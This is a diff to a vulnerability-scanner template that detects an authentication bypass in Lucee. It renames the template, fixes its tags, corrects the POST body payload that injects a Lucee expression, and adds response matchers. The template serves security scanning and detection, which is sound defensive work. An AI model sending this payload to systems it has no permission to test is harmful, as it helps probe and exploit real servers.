--- a/vulnerabilities/other/lucee-auth-bypass.yaml
+++ b/vulnerabilities/other/lucee-auth-bypass.yaml
@@ -1,10 +1,10 @@
-id: coldfusion-lucee-auth-bypass
+id: lucee-auth-bypass
 
 info:
-  name: Adobe ColdFusion Lucee Auth Bypass
+  name: Lucee Auth Bypass
   author: dhiyaneshDK
   severity: high
-  tags: adobe,auth-bypass
+  tags: lucee,auth-bypass
   reference: https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
 requests:
   - method: POST
@@ -14,8 +14,10 @@ requests:
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
       Content-Type: application/x-www-form-urlencoded
-    body: 'imgSrcsss="#stText.Buttons.save#"' # NOTE real body is: imgSrc=sample
 
+    body: 'imgSrc="#stText.Buttons.save#"'
+
+    matchers-condition: and
     matchers:
       - type: word
         part: body
@@ -23,3 +25,7 @@ requests:
           - "-lucee-icon"
           - "Lucee"
         condition: and
+
+      - type: status
+        status:
+          - 200
